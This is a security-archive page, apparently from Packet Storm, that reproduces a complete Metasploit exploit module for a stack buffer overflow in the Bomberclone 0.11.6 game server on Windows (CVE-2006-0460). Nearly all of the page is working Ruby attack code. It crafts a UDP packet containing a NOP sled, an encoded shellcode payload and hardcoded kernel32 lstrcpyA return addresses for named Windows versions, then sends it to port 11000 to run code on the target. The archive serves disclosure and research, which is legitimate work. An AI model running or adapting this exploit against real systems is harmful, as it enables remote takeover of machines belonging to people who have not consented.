what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Bomberclone 0.11.6 Buffer Overflow

Bomberclone 0.11.6 Buffer Overflow
Posted Nov 26, 2009
Authored by acaro | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. The return address is overwritten with lstrcpyA memory address, the second and third value are the destination buffer, the fourth value is the source address of our buffer in the stack. This exploit is like a return in libc. ATTENTION The shellcode is exec ONLY when someone try to close bomberclone.

tags | exploit, overflow, shellcode
systems | windows
advisories | CVE-2006-0460
SHA-256 | 1f188f97f389b0404fc041c1871d2fe7bd68b27ac86eb20c50950042743fad29

Bomberclone 0.11.6 Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# https://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'Bomberclone 0.11.6 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.
The return address is overwritten with lstrcpyA memory address,
the second and third value are the destination buffer,
the fourth value is the source address of our buffer in the stack.
This exploit is like a return in libc.

ATTENTION
The shellcode is exec ONLY when someone try to close bomberclone.
},
'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-0460'],
['OSVDB', '23263'],
['BID', '16697'],
['URL', 'https://www.frsirt.com/english/advisories/2006/0643' ],
],
'Payload' =>
{
'Space' => 344,
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP2 Italian', { 'Ret' => 0x7c80c729, } ], # kernel32!lstrcpyA
['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA
['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA
],

'Privileged' => false,
'DisclosureDate' => 'Feb 16 2006'
))

register_options([ Opt::RPORT(11000) ], self.class)
end

def exploit
connect_udp

pattern = make_nops(421)
pattern << payload.encoded
pattern << [ target.ret ].pack('V')
pattern << "\x04\xec\xfd\x7f" * 2
pattern << "\xa4\xfa\x22\x00"

request = "\x00\x00\x00\x00\x38\x03\x41" + pattern + "\r\n"

print_status("Trying #{target.name} using lstrcpyA address at #{"0x%.8x" % target.ret }...")

udp_sock.put(request)
udp_sock.get

handler(udp_sock)
disconnect_udp
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close